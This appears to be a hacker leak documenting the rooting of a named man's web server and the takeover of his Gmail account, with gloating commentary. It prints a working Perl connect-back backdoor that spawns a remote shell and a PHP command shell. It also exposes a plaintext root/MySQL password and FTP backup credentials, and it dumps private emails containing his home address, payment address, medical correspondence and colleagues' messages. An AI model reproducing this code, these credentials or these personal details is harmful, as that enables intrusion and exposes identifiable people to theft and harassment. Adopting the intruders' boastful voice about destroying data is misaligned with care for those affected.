2006 cook.php -rw-r--r-- 1 ryb ryb 3429 Aug 28 2006 COPYRIGHT.php -rw-r--r-- 1 ryb ryb 62050 Feb 18 2006 cover.jpg drwxr-xr-x 6 ryb ryb 4096 Jun 16 2008 data -rw-r--r-- 1 ryb ryb 730 Jan 26 2007 dc.pl -rw-r--r-- 1 ryb ryb 10664 Feb 10 2005 decrypt.php -rw-r--r-- 1 ryb ryb 857 Aug 3 2004 default.css -rw-r--r-- 1 ryb ryb 271191 Sep 29 2004 diafores.swf -rw-r--r-- 1 ryb ryb 32737 Aug 24 2004 DVD.html drwxr-xr-x 2 ryb ryb 4096 Jun 16 2008 editor -rw-r--r-- 1 ryb ryb 1275 Aug 16 2004 error_log -rw-r--r-- 1 ryb ryb 38858 Apr 20 2005 external.zip -rw-r--r-- 1 ryb ryb 1873 Feb 10 2005 flashfxp.php -rw-r--r-- 1 ryb ryb 61440 Feb 6 2005 Formmail2000Version3.0.tar 
drwxr-xr-x 2 ryb ryb 4096 Feb 8 2006 forum drwxr-xr-x 2 ryb ryb 4096 Dec 4 2005 freebsd drwxr-xr-x 2 ryb ryb 4096 Jun 16 2008 glafkos -rw-r--r-- 1 ryb ryb 29440 Apr 12 2006 glafkos.jpg -rw-r--r-- 1 ryb ryb 3535 Oct 11 2006 globals.php drwxr-xr-x 2 ryb ryb 4096 Jun 17 2004 Google -rw-r--r-- 1 ryb ryb 7694 Jun 15 2004 GoogleSearch.wsdl -rw-r--r-- 1 ryb ryb 0 Mar 4 2006 gv_system_702.zip drwxr-xr-x 3 ryb ryb 4096 Jun 16 2008 help -rw-r--r-- 1 ryb ryb 20270 Nov 17 2004 history.out -rw-r--r-- 1 ryb ryb 258 Jun 27 2006 horde.php -rw-r--r-- 1 ryb ryb 0 Jan 28 2007 .htaccess -rw-r--r-- 1 ryb ryb 5011 Oct 11 2006 .htaccess.bk -rw-r--r-- 1 ryb ryb 1915 Feb 13 2005 http.php drwxrwxrwx 9 ryb ryb 4096 Jun 16 2008 images drwxr-xr-x 2 ryb ryb 4096 Jun 16 2008 img drwxr-xr-x 10 ryb ryb 4096 Jun 16 2008 includes -rw-r--r-- 1 ryb ryb 335 Nov 3 2006 index2.html -rw-r--r-- 1 ryb ryb 4831 Aug 28 2006 index2.php -rw-r--r-- 1 ryb ryb 1729 Dec 17 2006 index.php -rw-r--r-- 1 ryb ryb 7193 Aug 28 2006 index.php.old -rw-r--r-- 1 ryb ryb 190965 Apr 3 2007 infosec.PNG -rw-r--r-- 1 ryb ryb 4374 Aug 28 2006 INSTALL.php -rwxrwxrwx 1 ryb ryb 251 Sep 21 2004 introbuilderuser.db drwxrwxrwx 7 ryb ryb 4096 Jun 16 2008 introusers -rw-r--r-- 1 ryb ryb 595 Nov 12 2004 ip.php -rw-rw-rw- 1 ryb ryb 21 Nov 12 2004 ip.txt -rw-r--r-- 1 ryb ryb 2918 Nov 12 2005 JCreator.torrent drwxrwxrwx 2 ryb ryb 4096 Jun 16 2008 language -rw-r--r-- 1 ryb ryb 6945 Jan 31 2005 level12.html drwxr-xr-x 2 ryb ryb 4096 Jun 16 2008 lib -rw-r--r-- 1 ryb ryb 17977 Aug 28 2006 LICENSE.php -rw-rw-rw- 1 ryb ryb 110386 Jun 9 04:23 log.txt -rw-r--r-- 1 ryb ryb 710 Aug 28 2006 mainbody.php -rw-r--r-- 1 ryb ryb 0 Jul 16 2004 main.html drwxrwxrwx 7 ryb ryb 4096 Jun 16 2008 mambots -rw-r--r-- 1 ryb ryb 9245 Apr 12 2006 me8.jpg drwxrwxrwx 2 ryb ryb 4096 Jun 16 2008 media drwxrwxrwx 2 ryb ryb 4096 Jun 16 2008 modules -rw-r--r-- 1 ryb ryb 68341 Apr 12 2006 mynewcar.jpg -rw-r--r-- 1 ryb ryb 343857 Nov 5 2005 mypc.jpg -rw-r--r-- 1 ryb ryb 193468 
Jun 15 2004 nusoap.php -rw-r--r-- 1 ryb ryb 162383 Jun 27 2006 nwo.txt -rw-r--r-- 1 ryb ryb 2474 Aug 28 2006 offlinebar.php -rw-r--r-- 1 ryb ryb 3808 Aug 28 2006 offline.php drwxr-xr-x 5 ryb ryb 4096 Jun 16 2008 online -rw-r--r-- 1 ryb ryb 709 Aug 28 2006 pathway.php drwxr-xr-x 2 ryb ryb 4096 Jun 16 2008 php drwxr-xr-x 10 ryb ryb 4096 Jun 16 2008 phpBB drwxr-xr-x 10 ryb ryb 4096 Jun 16 2008 Project drwxrwxrwx 2 ryb ryb 4096 Jun 16 2008 rapid -rw-r--r-- 1 ryb ryb 66560 May 1 2003 revealer.exe -rw-r--r-- 1 ryb ryb 286 Aug 28 2006 robots.txt -rw-r--r-- 1 ryb ryb 430775 Jun 20 2004 rockxp.exe -rw-r--r-- 1 ryb ryb 37058 Nov 23 2004 rst_sql.php -rw-r--r-- 1 ryb ryb 137349 Nov 24 2005 sample.jpg -rw-r--r-- 1 ryb ryb 4055 Jun 15 2004 search.php -rw-r--r-- 1 ryb ryb 31 Jun 3 2007 shell.txt -rw-r--r-- 1 ryb ryb 1639 Jun 15 2004 showcache.js drwxr-xr-x 3 ryb ryb 4096 Jun 16 2008 sitebuilder drwxr-xr-x 5 ryb ryb 4096 Jun 16 2008 strover drwxr-xr-x 3 ryb ryb 4096 Jun 16 2008 teamproject drwxrwxrwx 4 ryb ryb 4096 May 9 12:17 templates -rw-r--r-- 1 ryb ryb 131021 Jun 15 2004 unicode-gb.tab -rw-r--r-- 1 ryb ryb 139264 Jun 21 2005 UStorageWin98Driver20.exe sh-3.1# cat a.php &1"); echo " $out "; ?> // ?? sh-3.1# cat cmd.txt */ $cmd = $_REQUEST['-cmd']; $history = $_REQUEST['history']; if(!$history) $history = 'HiSTORY ------------------------------------------------------'; if($cmd) $history .= "\n" . $cmd; header('text/html; charset=EUC-JP;'); ?> cmd.php



sh-3.1# cat configuration.php sh-3.1# cat cook.php Error:404 // :O ITS A TRAP 404!!!111ONEONEcos(0)1 sh-3.1# cat dc.pl #!/usr/bin/perl use Socket; print "Data Cha0s Connect Back Backdoor\n\n"; if (!$ARGV[0]) { printf "Usage: $0 [Host] \n"; exit(1); } print "[*] Dumping Arguments\n"; $host = $ARGV[0]; $port = 80; if ($ARGV[1]) { $port = $ARGV[1]; } print "[*] Connecting...\n"; $proto = getprotobyname('tcp') || die("Unknown Protocol\n"); socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n"); my $target = inet_aton($host); if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) { die("Unable to Connect\n"); } print "[*] Spawning Shell\n"; if (!fork( )) { open(STDIN,">&SERVER"); open(STDOUT,">&SERVER"); open(STDERR,">&SERVER"); exec {'/bin/sh'} '-bash' . "\0" x 4; exit(0); } print "[*] Datached\n\n"; sh-3.1# head decrypt.php sh-3.1# cat shell.txt // Next! sh-3.1# mysql Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 105984 Server version: 5.0.77-community MySQL Community Edition (GPL) Type 'help;' or '\h' for help. Type '\c' to clear the buffer. 
mysql> show databases;
+---------------------------+
| Database                  |
+---------------------------+
| information_schema        |
| ariadmin_metoxa           |
| ariadmin_redesign         |
| ariadmin_script           |
| ariadmin_sfinxtrade       |
| cphulkd                   |
| crownvip_site             |
| defaultp_milworm          |
| defaultp_ports            |
| eximstats                 |
| glafcom_blog              |
| horde                     |
| indianos_blueinstinct     |
| indianos_silentfreediver  |
| infosec2_hash             |
| infosec_acms              |
| infosec_ads               |
| infosec_cms               |
| infosec_cracker           |
| infosec_dp                |
| infosec_exam              |
| infosec_forms             |
| infosec_ip2country        |
| infosec_is                |
| infosec_isu               |
| infosec_md5               |
| infosec_milworm           |
| infosec_phpfunctions      |
| infosec_wp                |
| itkb_itkb                 |
| leechprotect              |
| modsec                    |
| mysql                     |
| nowayin_archonmodelagency |
| nowayin_avpower           |
| nowayin_casino            |
| nowayin_ctspropertiescy   |
| nowayin_law               |
| nowayin_magazaki          |
| nowayin_plantruck         |
| nowayin_rainbowgalleryart |
| nowayin_rent              |
| nowayin_sportscafe        |
| nowayin_tabacaleratroya   |
| nowayin_traveltest        |
| roundcube                 |
| royallim_site             |
| ryb_ab                    |
| ryb_db                    |
| ryb_dbstore               |
| ryb_estate                |
| ryb_joomla                |
| ryb_mail                  |
| ryb_mysql                 |
| ryb_phpbb1                |
| ryb_site                  |
| test                      |
| webhostl_billing          |
| webhostl_hosting          |
| webhostl_site             |
| webtech_eventbook         |
| webtech_redseal           |
| x00mario_lockr            |
+---------------------------+
63 rows in set (0.00 sec)
// We looked through most of his databases. They have nothing but hashes, milw0rm rips and a couple of users.
// I don't think he will mind us dropping them ^^
sh-3.1# cd
sh-3.1# ls -la
total 216
drwxr-x--- 16 root root 4096 Jun 9 05:10 .
drwxr-xr-x 26 root root 4096 May 27 00:09 ..
-rw------- 1 root root 1006 Dec 31 2003 anaconda-ks.cfg -rw------- 1 root root 13155 Jun 8 16:46 .bash_history -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout -rw-r--r-- 1 root root 313 Jul 25 2008 .bash_profile -rw-r--r-- 1 root root 333 Jul 25 2008 .bashrc drwxr-xr-x 4 root root 4096 Jul 25 2008 .cpanel drwxr-xr-x 4 root root 4096 Jul 25 2008 cpanel3-skel drwx------ 3 root root 4096 Jul 25 2008 .cpobjcache -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc drwxr-xr-x 8 root root 4096 Apr 8 16:55 downloads drwx------ 3 root root 4096 Dec 31 2003 .gconf drwx------ 2 root root 4096 Dec 31 2003 .gconfd drwx------ 2 root root 4096 Mar 16 18:25 .gnupg -rw-r--r-- 1 root root 9089 Jun 19 2008 hninst.sh.1 -rw-r--r-- 1 root root 21743 Dec 31 2003 install.log -rw-r--r-- 1 root root 4060 Dec 31 2003 install.log.syslog -rw------- 1 root root 35 Nov 7 2008 .lesshst drwx------ 6 root root 4096 Jul 25 2008 .MirrorSearch -rw------- 1 root root 39 Jul 25 2008 .my.cnf -rw------- 1 root root 220 Jun 9 04:57 .mysql_history drwxr-xr-x 2 root root 4096 Nov 2 2008 .ncftp -rw-r--r-- 1 root root 264 May 27 00:09 .pearrc drwxr-xr-x 2 root root 4096 Jul 25 2008 public_ftp drwxr-xr-x 3 root root 4096 Jul 25 2008 public_html -rw------- 1 root root 1024 Mar 25 00:04 .rnd -rw------- 1 root root 0 Nov 21 2008 .securesslreqs -rwxr-xr-x 1 root root 554 May 23 2008 sks.pl drwx------ 3 root root 4096 Jul 25 2008 .spamassassin drwx------ 2 root root 4096 Jul 25 2008 .ssh -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc drwxr-xr-x 3 root root 4096 Nov 27 2008 tmp -rw------- 1 root root 0 Nov 21 2008 .trustwavereqs sh-3.1# cat .bash_history rm md5.TMD ls df -h ls -la myisamchk -q -r -f -s *.MYI exit clear ps -aux |grep mysql mysql -v df -h cd /var/lib/mysql/infosec_md5/ ls ls -la myisamchk -r -s *.MYI ping 10.0.7.198 [snip] nmap -v -P0 unesco.org.uk /etc/apf/afp -f /etc/apf -f /etc/apf/apf -f nmap -v -P0 unesco.org.uk nmap -v -P0 diatrofologos.com nmap -v -P0 www.diatrofologos.com nmap -v -P0 -p 21 
www.diatrofologos.com nmap -v -P0 -p 22 www.diatrofologos.com nmap -v -P0 -p 80 www.diatrofologos.com /etc/apf/apf -t /etc/apf/apf /etc/apf/apf -r ls cd /etc/apf ls cat allow_hosts.rules nano allow_hosts.rules ./apf -r nano allow_hosts.rules ./apf -r exit [snip] /etc/apf/apf -f nmap -v -sV -P0 94.65.66.61 who last lastlog last last last cd /var/log/ ls ls -la /etc/apf/apf -t /etc/apf/apf -r [snip] cat .my.cnf ls cd $hme cd $home crntab -l crontab -l sh /root/downloads/remoteftpbackup/ftpbackup.sh | mail -s "Daily Remote Backup Complete" glafkos@gmail.com sh /root/downloads/remoteftpbackup/ftpbackup.sh ls cd .. [snip] /sbin/ifconfig cd / cd root ls cd downloads/ ls nano ping.sh chmod +x ping.sh sh ping.sh ping chmod +x ping.sh > test.txt sh ping.sh > test.txt wc -l test.txt nano test.txt cat test.txt ping 66.96.220.217 [snip] nano includes/vars.inc.php ls -la ls -la includes/vars.inc.php nmap -v -sV -P0 mail.sobohgroup.com /etc/apf/apf -f nmap -v -sV -P0 mail.sobohgroup.com nmap -v -sV -P0 mail.sobohgroup.com [snip] cat ftpbackup.sh ftp nowayout.myftp.org lynx whatismyip.com ifconfig -a /sbin/ifconfig ftp nowayout.myftp.org nmap -v -p 21 nowayout.myftp.org nmap -v -p 21 -P0 nowayout.myftp.org nmap -v -p 21 -P0 nowayout.myftp.org nmap -v -p 21 -P0 nowayout.myftp.org nmap -v -p 21 -P0 nowayout.myftp.org [snip] rdesktop rdesktop -k en-us -a 16 -u username -p "password" ipaddress rdesktop -F rdesktop -F server [snip] df -h nmap -v -sV -P0 -O gcontrol.redirectme.net /etc/apf/apf -a /etc/apf/apf -f clear nmap -v -sV -P0 -O gcontrol.redirectme.net [snip] nmap -v -sV -P0 -O gcontrol.redirectme.net /etc/apf/apf -a /etc/apf/apf -f clear nmap -v -sV -P0 -O gcontrol.redirectme.net nmap -v -sV -O gcontrol.redirectme.net nmap -v -sV -P0 -O gcontrol.servegame.com nmap -v -P0 -sV cypt-45.no-ip.biz nmap -v -P0 -sV cypt-27.no-ip.biz [snip] /etc/apf/apf -f nmap -v -sV -p 1-65535 -P0 195.97.106.88 -oN /home/itkb/www/nmap.txt nmap -v -sV -p 1-65535 -P0 195.97.106.88 -oN 
/home/itkb/www/nmap.txt & nmap -sV -p 22 -P0 195.97.106.88 nmap -sV -p 23 -P0 195.97.106.88 telnet 195.97.106.88 23 telnet 195.97.106.88 22 telnet gcontrol.servegame.com 22 ping gcontrol.servegame.com telnet gcontrol.servegame.com 23 srshaxsir at hushmail Jun 4, 2009, 6:58 PM Post #1 of 1 (70 views) nmap -v -P0 gcontrol.servegame.com /etc/apf/apf -f nmap -v -P0 gcontrol.servegame.com telnet gcontrol.servegame.com 23 telnet gcontrol.servegame.com 22 srshaxsir at hushmail Jun 4, 2009, 6:58 PM Post #1 of 1 (70 views) nmap -v -P0 gcontrol.servegame.com /etc/apf/apf -f nmap -v -P0 gcontrol.servegame.com telnet gcontrol.servegame.com 23 telnet gcontrol.servegame.com 22 [snip] srshaxsir at hushmail srshaxsir at hushmail <---- Told you he was snooping around.. sh-3.1# cat .my.cnf [client] user="root" pass="r4-h121!@#" <--- His MySQL root password is the same as the root account password, you sir, are an idiot. sh-3.1# cd downloads sh-3.1# ls -la total 1032 drwxr-xr-x 8 root root 4096 Apr 8 16:55 . drwxr-x--- 16 root root 4096 Jun 9 05:21 .. drwxr-x--- 3 root root 4096 Jul 29 2008 apf -rw-r--r-- 1 root root 105310 Jul 30 2008 apf-current.tar.gz drw-r--r-- 3 root root 4096 Jul 30 2008 bfd-1.2 -rw-r--r-- 1 root root 17212 Jul 30 2008 bfd-current.tar.gz drwxr-xr-x 2 1000 1000 4096 Dec 17 2007 chkrootkit -rw-r--r-- 1 root root 38323 Jul 25 2008 chkrootkit.tar.gz -rw-r--r-- 1 root root 1348 Sep 16 2004 ftpbackup.tar.gz drwxr-xr-x 14 root wheel 4096 Nov 2 2008 ncftp-3.2.2 -rw-r--r-- 1 root root 540436 Nov 2 2008 ncftp-3.2.2-src.tar.gz -rwxr-xr-x 1 root root 122 Mar 16 17:03 ping.sh drwxr-xr-x 4 root root 4096 Apr 8 16:57 rdesktop-1.6.0 -rw-r--r-- 1 root root 284728 May 11 2008 rdesktop-1.6.0.tar.gz drwxr-xr-x 2 32170 32171 4096 Nov 2 2008 remoteftpbackup -rw-r--r-- 1 root root 220 Mar 16 17:04 test.txt // -_-' all of that, and he still couldn't secure the box.... 
sh-3.1# cat ping.sh
#!/bin/bash
for ip in $(seq 1 254);do
ping -c 1 66.96.220.$ip | grep "bytes from" | cut -d" " -f4 | cut -d ":" -f1 &
done

sh-3.1# cat test.txt
66.96.220.1
66.96.220.209
66.96.220.209
66.96.220.39
66.96.220.97
66.96.220.209
66.96.220.133
66.96.220.161
66.96.220.209
66.96.220.182
66.96.220.209
66.96.220.213
66.96.220.214
66.96.220.215
66.96.220.216
66.96.220.217

sh-3.1# cd remoteftpbackup
sh-3.1# ls -la
total 12
drwxr-xr-x 2 32170 32171 4096 Nov  2  2008 .
drwxr-xr-x 8 root  root  4096 Apr  8 16:55 ..
-rwxr-xr-x 1 root  root   678 Apr 10 05:20 ftpbackup.sh

sh-3.1# cat ftpbackup.sh
#!/bin/bash
# Remote FTP Backup Script
# Author: Charalambous Glafkos
# Contact: glafkos@itsolutionskb.com
# Visit: http://www.itsolutionskb.com
# Copyright 2008 IT Solutions KB
FTPStatus=y
HOST='nowayout.myftp.org'
USERNAME='backup'
PASSWORD='b4ckup$#'
REMOTEDIR=`date +'%d-%m-%Y'`
HOSTNAME='/bin/hostname'
LOCALDIR='/home/backups/cpbackup/daily'
[snip]

// lol. we are going to move to his Gmail account now :]

--------------------------------
[ glafkos@gmail.com ]
--------------------------------

Return-Path:
From: "Glafkos Charalambous"
To: "'Edward Lansink'"
Subject: RE: [IT Solutions Knowledge Base] Network security

Hello Edward,

This is my PayPal address paypal@webhostline.com

Sorry for delay but we have huge problem with Astalavista.com/.net
Some script kiddies hacked us and we are trying to recover everything back..
http://kotrotsos.com/wp-content/uploads/2009/06/astalavista.txt
It seems that an 0day Light Speed Exploit was used .. from there on was a piece of cake..

// You called us script kiddies, we are reading your email, we rooted your box while you were logged on it, we took everything and in a minute it will all be -gone-.
############################################################################
Delivered-To: glafkos@gmail.com
Return-Path:
Subject: RE: [IT Solutions Knowledge Base] Network security
Date: Mon, 8 Jun 2009 09:51:14 +0200
From: "Edward Lansink"
To: "Glafkos Charalambous"

Hi Glafkos,

I hadn't had a chance to look at your email before, sorry for the late reply! I just sent over payment by Paypal, can you please confirm you received it?

Sorry to hear you're having trouble with Astalavista.com. I didn't know you're part of that project as well... I think we used to advertise there a while back but although there was interest in LANguard it didn't do much commercially (for obvious reasons). Hope you guys manage to recover everything!

Best regards,
Edward Lansink
GFI Software - www.gfi.com
############################################################################
Return-Path:
Subject: RE: [IT Solutions Knowledge Base] Network security
Date: Mon, 8 Jun 2009 11:03:51 +0300

Hello Edward,

I received the payment of 240 USD for 3 months trial advertisement as we agreed.

Thank you for your kind words. We are working to recover everything. Owner and friend of mine Pascal is outside country for 10 days due to a congress and we will have to wait for him to come back to proceed. We are thinking to change everything and start with new approach and new ideas but we will see..

I already track down the guy behind that but not 100% sure yet. There is also one guy inside Astalavista stuff responsible but I don't want to speak a lot yet :)

Kindly Regards,
Glafkos

// That, sir, is what got you owned... stop poking around.
############################################################################
Date: Mon, 8 Jun 2009 14:16:15 +0300
Delivered-To: glafkos@gmail.com
Subject: Glafkos Process
From: Glafkos Charalambous
To: Milorad Mitkovic
--001636c5a53ce0251a046bd45ed9
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

Hello Dr,

I am 6cm taller today..
it's been the last 2 months I am clicking in a slow rate of 3 clicks per day and I do some breaks. I walk before and after each click and do some stretching on the walker. When I go out for a coffee or something I take the car and I walk from the car to the coffee for 100-200 meters.

I need your advice so I can avoid misalignment as I had already talked with Nicolai and I am little worried. Could you please give me more advice as I want not to have any complications?

Thanks
Glafkos

// lol!
############################################################################
Delivered-To: glafkos@gmail.com
Date: Mon, 8 Jun 2009 20:54:17 +0200
Subject: Re: Glafkos Process
From: Milorad Mitkovic
To: Glafkos Charalambous

Hi Mr. Glafkos,

Congratulations. It is good to do 3 per day and to do breaks. There is no special advice to avoid misalignment. In some people muscles do not allow further lengthening and produce misalignment. If you discover any deformity when standing (''O'' or ''X'' deformity or bumping) please inform me or send a picture.

Best regards
Dr.
Milorad Mitkovic
############################################################################
From: "Glafkos Charalambous"
To: "'Milorad Mitkovic'"
Subject: RE: Glafkos Process
Date: Tue, 9 Jun 2009 03:16:47 +0300

Hello Dr,

Thanks for the advice..

What do u mean by:
If you discover any deformity when standing (''O'' or ''X'' deformity or bumping)

Can you explain me more simple please? As I did not understand..

I still have more muscle but I do not want to cause any problems:)

Thanks
Glafkos

// You will never get to see his response Glafkos, never.
############################################################################
Delivered-To: glafkos@gmail.com
To: Administrator
Subject: [IT Solutions Knowledge Base] Network security
From: WordPress
Reply-To: Edward Lansink
Date: Fri, 22 May 2009 08:58:49 -0400

Hi Glafkos,

I noticed the posts in the Network security category provide tutorial style info about a few network security tools and I was wondering whether you'd be interested in having a look at GFI LANguard (www.gfi.com/lannetscan). It's a network vulnerability scanner like Nessus and also does patch management and network auditing.
There's a freeware version available now (full functionality for up to 5 IPs) and maybe that makes it more interesting for your blog readers. If you like I can give you a full 12-month license key so you can test it out on larger networks. You can keep the key and there are no strings attached - you're not committing to anything!

I hope it's of interest to you and I look forward to hearing from you. Keep up the good work on the blog!

Best regards,
Edward Lansink - GFI Software
---
Website: www.gfi.com
---
IP address: http://ws.arin.net/whois/?queryinput=78.133.123.235
Form referrer: http://www.itsolutionskb.com/contact-us/
Orig. referrer: http://www.itsolutionskb.com/
User agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
############################################################################
Date: Fri, 22 May 2009 16:29:13 +0300
Delivered-To: glafkos@gmail.com
Subject: Re: [IT Solutions Knowledge Base] Network security
From: Glafkos Charalambous
To: Edward Lansink

Hello Edward,

I would be interested to have a license key to try it out on my companies that I manage. I am sure that it would be nice also to write some articles about it on my website.
Thank you for contacting us

Regards,
Glafkos
############################################################################
Delivered-To: glafkos@gmail.com
Subject: RE: [IT Solutions Knowledge Base] Network security
Date: Fri, 22 May 2009 15:44:10 +0200
From: "Edward Lansink"
To: "Glafkos Charalambous"

Hi Glafkos,

Thanks for your quick reply and for your interest in GFI LANguard. I'm about to request a license key for you - Can I just ask you for the following info? This is purely procedural, to keep a log of the owners of license keys and we won't use your personal details for anything else.
Address:
Zip/postal code:
City:
Country:

I expect to be able to send you a license key + download links and links to manuals & further info on Monday.

Have a good weekend and thanks again for having a look at GFI LANguard!

Best regards,
Edward

Edward Lansink
GFI Software - www.gfi.com
############################################################################
Date: Fri, 22 May 2009 16:54:50 +0300
Delivered-To: glafkos@gmail.com
Subject: Re: [IT Solutions Knowledge Base] Network security
From: Glafkos Charalambous
To: Edward Lansink

Hello Edward,

Thank you for your prompt response

My Details are:
Address: Kritis 21
Zip/Postal: 3087
City: Limassol
Country: Cyprus

Would you be interested to be advertised on IT Solutions Knowledge Base Header ?
Best Regards,
Glafkos
############################################################################
Delivered-To: glafkos@gmail.com
Subject: RE: [IT Solutions Knowledge Base] Network security
Date: Fri, 22 May 2009 16:03:13 +0200
From: "Edward Lansink"
To: "Glafkos Charalambous"

Thanks Glafkos,

One more thing: How large is the network you'd like to try GFI LANguard on please? An estimate number of IP addresses is what I'm looking for.

We do advertise on IT sites but it really depends on the number of unique visitors your site gets per month.
Can you tell me what that figure is please?

Best regards,
Edward Lansink
GFI Software - www.gfi.com
############################################################################
Date: Fri, 22 May 2009 17:24:11 +0300
Delivered-To: glafkos@gmail.com
Subject: Re: [IT Solutions Knowledge Base] Network security
From: Glafkos Charalambous
To: Edward Lansink

1) The network is 20 machines as I do not want to demonstrate this on larger companies yet.

2) Concerning the site I can send you daily reports of the status. The unique visitors are around 720 since the last 3 days and day by day we are growing larger and larger. The site is only 6 months old. We can be found on top searches and we have a very good ranking on google. The reason behind this is that our articles are unique and covering many different products and solutions and I am sure that you will target specific people through our site.

Only for IT Solutions we are on third page 24th out of 130 Million results.
Ref: http://www.google.com/#q=it+solutions&hl=en&start=20&sa=N&fp=EPM4eul9pXk

Thanks,
Glafkos
############################################################################
Delivered-To: glafkos@gmail.com
Subject: RE: [IT Solutions Knowledge Base] Network security
Date: Fri, 22 May 2009 16:39:41 +0200
From: "Edward Lansink"
To: "Glafkos Charalambous"

For a 6 month old site that’s pretty reasonable traffic you have I must say and with that design I’m sure you’ll be able to grow further.
Even though traffic is still on the low side, if you can offer us a position with high visibility we can work out something. If anything, it will be text links and maybe a logo and on the left hand side of the site, not a banner and on the right hand side. Do you think that would work for you? The cost would obviously depend on the positioning…

Edward

Edward Lansink
GFI Software - www.gfi.com
############################################################################
Date: Fri, 22 May 2009 17:50:13 +0300
Delivered-To: glafkos@gmail.com
Subject: Re: [IT Solutions Knowledge Base] Network security
From: Glafkos Charalambous
To: Edward Lansink

Thanks Edward.

I can put an advertisement of yours in front of the page on the slideshow header if you are interested and on subpages on the right. I am attaching you 2 photos of the places that we can put the advertisements.
Regards,
Glafkos
############################################################################
Delivered-To: glafkos@gmail.com
Subject: RE: [IT Solutions Knowledge Base] Network security
Date: Wed, 27 May 2009 16:25:52 +0200
From: "Edward Lansink"
To: "Glafkos Charalambous"

Hi Glafkos,

I see you got the license key for LANSS alright.
Thanks again for writing about GFI LANguard, much appreciated!

As for advertising, I understand the spots you mentioned are the main ones for your site but I think the first option is too big and "in your face" and the second is in a position where it won't get much attention. Do you think you could offer us a small image and 5 words of text between the language and category widgets on the left hand side instead?

I'd like to work with you on advertising to help support the site but in the end what counts to us is that enough people come to our website and try out our software. If we don't get enough downloads I can't continue advertising on your site, that's why I'm trying to find a solution that will work best for both of us.

Best regards,
Edward

Edward Lansink
GFI Software - www.gfi.com
############################################################################
Date: Wed, 27 May 2009 18:35:50 +0300
Delivered-To: glafkos@gmail.com
Subject: Re: [IT Solutions Knowledge Base] Network security
From: Glafkos Charalambous
To: Edward Lansink

Hello Edward,

Thank you for the license. I can place the AD in the place you need and we can see how well it goes with the traffic. I am very open minded to more suggestions

Regards,
Glafkos

// ...
and it goes on and on, We took your domain, you can't advertise there anymore.
############################################################################
Delivered-To: glafkos@gmail.com
From: Polykarpos Yiannoudes
To: Glafkos Charalambous, Panagiotis Charalambous, Altis - Louis Loizou
CC: Anna Charalambous
Date: Fri, 29 May 2009 09:08:20 +0300
Subject: http://support.uibs.net/ and Staging

Dear All,

Staging and its websites are not responding from outside.
Panagiotis please contact Glafkos and Louis to resolve this issue.

Thank you
############################################################################
Delivered-To: glafkos@gmail.com
From: Panagiotis Charalambous
To: Polykarpos Yiannoudes, Glafkos Charalambous, Altis - Louis Loizou
CC: Anna Charalambous
Date: Fri, 29 May 2009 10:13:49 +0300
Subject: RE: http://support.uibs.net/ and Staging

Dear All,

I am getting the following error while trying to access staging web sites
http://support.microsoft.com/kb/944114

It seems that something is wrong with the network configuration but I do not have the privileges to check. It seems that infosec is used as a proxy for stating and is causing this issue.

Please check
I have already mentioned this to Glafkos to investigate.

Thanks,
Panagiotis

From: Polykarpos Yiannoudes
Sent: Friday, May 29, 2009 9:08 AM
To: Glafkos Charalambous; Panagiotis Charalambous; Altis - Louis Loizou
Cc: Anna Charalambous
Subject: http://support.uibs.net/ and Staging

Dear All,

Staging and its websites are not responding from outside.
Panagiotis please contact Glafkos and Louis to resolve this issue.

Thank you
############################################################################
From: "Glafkos Charalambous"
To: "'Polykarpos Yiannoudes'", "'Panagiotis Charalambous'", "'Altis - Louis Loizou'"
Cc: "'Anna Charalambous'"
Subject: RE: http://support.uibs.net/ and Staging
Date: Fri, 29 May 2009 10:58:00 +0300

Dear all,

I have checked everything and I finally noticed that there is an issue with the network cables on HP_DL380A server. Both network cards have internal network access and thus causing the staging server not to take the external IP directly from Otenet.

Please someone to get on the server room and give me a phone call.

Regards,
Glafkos
############################################################################
Delivered-To: glafkos@gmail.com
From: "Altis - Louis Loizou"
To: "'Glafkos Charalambous'", "'Polykarpos Yiannoudes'", "'Panagiotis Charalambous'"
Cc: "'Anna Charalambous'"
Subject: RE: http://support.uibs.net/ and Staging
Date: Fri, 29 May 2009 11:08:42 +0300
------=_NextPart_000_0071_01C9E04D.D510A030 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Dear Glafko, Only one cable (white) is connected on internal network (Switch) and the other (blue) is connected on Otenet's modem. This is the way was before I left last night. Regards, Louis ############################################################################ Return-Path: Received: from UiBSSupport ([91.184.220.239]) by mx.google.com with ESMTPS id 7sm2080489eyb.45.2009.05.29.01.32.32 (version=SSLv3 cipher=RC4-MD5); Fri, 29 May 2009 01:32:33 -0700 (PDT) From: "Glafkos Charalambous" To: "'Altis - Louis Loizou'" , "'Polykarpos Yiannoudes'" , "'Panagiotis Charalambous'" Cc: "'Anna Charalambous'" References: <00cb01c9e033$315f4190$941dc4b0$@com> <007001c9e034$afc36830$0f4a3890$@loizou@altiscy.com> In-Reply-To: <007001c9e034$afc36830$0f4a3890$@loizou@altiscy.com> Subject: RE: http://support.uibs.net/ and Staging Date: Fri, 29 May 2009 11:31:46 +0300 Message-ID: <00d601c9e037$e94228a0$bbc679e0$@com> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_00D7_01C9E051.0E8F60A0" X-Mailer: Microsoft Office Outlook 12.0 Thread-Index: AcngI93cEBf8ABFmScmlKvFsZmHlQgADoLhQAAB9LYAAAMiHMA== Content-Language: en-us This is a multi-part message in MIME format. ------=_NextPart_000_00D7_01C9E051.0E8F60A0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit Hello Louis, Then I think we are missing one more cable that has to be directly connected to HP_DL380A on the second card interface. The main reason is that we are not getting external ip directly from Otenet modem. Does anyone has access to server room as Polys is not in the office? 
